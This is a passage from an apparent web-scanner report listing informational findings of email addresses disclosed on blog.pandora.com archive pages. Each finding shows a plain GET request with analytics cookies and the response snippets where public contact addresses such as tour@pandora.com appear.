Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:13 GMT
ETag: "79e049-7adb-498819dd49340"
Accept-Ranges: bytes
Content-Length: 31451
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<p>Our use of existing namespaces is one area where I'm particularly interested in feedback during the beta period. Drop a note to pandora-support@pandora.com with "RSS Beta" in the subject line if you'd like to share your perspectives and feedback with us. I'm looking forward to talking with you about it. You are also invited to leave your comments here on
...[SNIP]...

20.6. http://blog.pandora.com/pandora/archives/2006/03/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/03/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2006/03/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:54 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:54:13 GMT
ETag: "79e0a4-16dfb-4990aa1f8c340"
Accept-Ranges: bytes
Content-Length: 93691
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<p>Please RSVP by sending an email to tour@pandora.com with DC in the subject line. Hope to see you there!</p>
...[SNIP]...

20.7. http://blog.pandora.com/pandora/archives/2006/04/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/04/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2006/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:54:11 GMT
ETag: "79e603-ad7c-4990aa1da3ec0"
Accept-Ranges: bytes
Content-Length: 44412
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.8. http://blog.pandora.com/pandora/archives/2006/05/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/05/

Issue detail

The following email address was disclosed in the response:

tim.westergren@pandora.com

Request

GET /pandora/archives/2006/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:50 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Tue, 04 Jan 2011 19:54:11 GMT
ETag: "79e062-f7c5-4990aa1da3ec0"
Accept-Ranges: bytes
Content-Length: 63429
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<strong>tim.westergren@pandora.com</strong>
...[SNIP]...

20.9. http://blog.pandora.com/pandora/archives/2006/06/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/06/

Issue detail

The following email addresses were disclosed in the response:

pandora-support@pandora.com
timinny@pandora.com
tour@pandora.com

Request

GET /pandora/archives/2006/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:09 GMT
ETag: "79e608-10b18-498819d978a40"
Accept-Ranges: bytes
Content-Length: 68376
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:pandora-support@pandora.com">
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<strong>timinny@pandora.com</strong>
...[SNIP]...

20.10. http://blog.pandora.com/pandora/archives/2006/07/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/07/

Issue detail

The following email addresses were disclosed in the response:

tim.westergren@pandora.com
tour@pandora.com

Request

GET /pandora/archives/2006/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:46 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:09 GMT
ETag: "79e063-575c-498819d978a40"
Accept-Ranges: bytes
Content-Length: 22364
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<strong>tim.westergren@pandora.com</strong>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.11. http://blog.pandora.com/pandora/archives/2006/08/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/08/

Issue detail

The following email addresses were disclosed in the response:

tim.westergren@pandora.com
tour@pandora.com

Request

GET /pandora/archives/2006/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:44 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:09 GMT
ETag: "79e09b-48ac-498819d978a40"
Accept-Ranges: bytes
Content-Length: 18604
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<strong>tour@pandora.com</strong>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<strong>tim.westergren@pandora.com</strong>
...[SNIP]...

20.12. http://blog.pandora.com/pandora/archives/2006/09/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/09/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2006/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:44 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 07 Jan 2011 22:22:10 GMT
ETag: "79e06d-5e17-499490c9b2880"
Accept-Ranges: bytes
Content-Length: 24087
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
the various meetings and talks. I left town energized and armed with a bunch of great new ideas. I've posted some pix and thoughts below... if you have any you'd like me to add, please send 'em in - tour@pandora.com</p>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com ">tour@pandora.com </a>
...[SNIP]...

20.13. http://blog.pandora.com/pandora/archives/2006/10/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/10/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2006/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:43 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Fri, 07 Jan 2011 22:34:19 GMT
ETag: "79e0f5-9e0b-49949380ed0c0"
Accept-Ranges: bytes
Content-Length: 40459
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="http://">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...

20.14. http://blog.pandora.com/pandora/archives/2006/12/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2006/12/

Issue detail

The following email address was disclosed in the response:

pandora-support@pandora.com

Request

GET /pandora/archives/2006/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:41 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:07 GMT
ETag: "7cc4b2-6dc9-498819d7905c0"
Accept-Ranges: bytes
Content-Length: 28105
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:pandora-support@pandora.com">pandora-support@pandora.com</a>
...[SNIP]...

20.15. http://blog.pandora.com/pandora/archives/2007/02/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/02/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2007/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:40 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:05 GMT
ETag: "7cc524-a105-498819d5a8140"
Accept-Ranges: bytes
Content-Length: 41221
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com</a>
...[SNIP]...

20.16. http://blog.pandora.com/pandora/archives/2007/04/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/04/

Issue detail

The following email address was disclosed in the response:

tim.westergren@pandora.com

Request

GET /pandora/archives/2007/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:38 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:05 GMT
ETag: "7cc51e-a179-498819d5a8140"
Accept-Ranges: bytes
Content-Length: 41337
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<br />
RSVP: Send email to tim.westergren@pandora.com</p>
...[SNIP]...

20.17. http://blog.pandora.com/pandora/archives/2007/05/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/05/

Issue detail

The following email address was disclosed in the response:

pandora-support@pandora.com

Request

GET /pandora/archives/2007/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:36 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:05 GMT
ETag: "7cc51c-758f-498819d5a8140"
Accept-Ranges: bytes
Content-Length: 30095
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:pandora-support@pandora.com">
...[SNIP]...

20.18. http://blog.pandora.com/pandora/archives/2007/06/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/06/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2007/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:36 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:03 GMT
ETag: "7cc091-63ba-498819d3bfcc0"
Accept-Ranges: bytes
Content-Length: 25530
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...

20.19. http://blog.pandora.com/pandora/archives/2007/07/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/07/

Issue detail

The following email addresses were disclosed in the response:

both@absolutelykosher.com
tour@pandora.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:03 GMT
ETag: "7cc51b-9333-498819d3bfcc0"
Accept-Ranges: bytes
Content-Length: 37683
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="business" value="both@absolutelykosher.com">
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...
<a href="mailto:tour@pandora.com">tour@pandora.com </a>
...[SNIP]...

20.20. http://blog.pandora.com/pandora/archives/2007/08/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2007/08/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2007/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:03 GMT
ETag: "7cc501-7fc3-498819d3bfcc0"
Accept-Ranges: bytes
Content-Length: 32707
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<br />
RSVP: tour@pandora.com</p>
...[SNIP]...

20.21. http://blog.pandora.com/pandora/archives/2008/01/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/01/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2008/01/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:05:24 GMT
Server: Apache/2.2.9 (Debian)
Last-Modified: Wed, 29 Dec 2010 00:26:01 GMT
ETag: "7cc4d2-5f78-498819d1d7840"
Accept-Ranges: bytes
Content-Length: 24440
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</b> by sending an email to Angie at tour@pandora.com with Las Vegas in the subject line.</p>
...[SNIP]...

20.22. http://blog.pandora.com/pandora/archives/2008/02/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2008/02/

Issue detail

The following email address was disclosed in the response:

tour@pandora.com

Request

GET /pandora/archives/2008/02/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
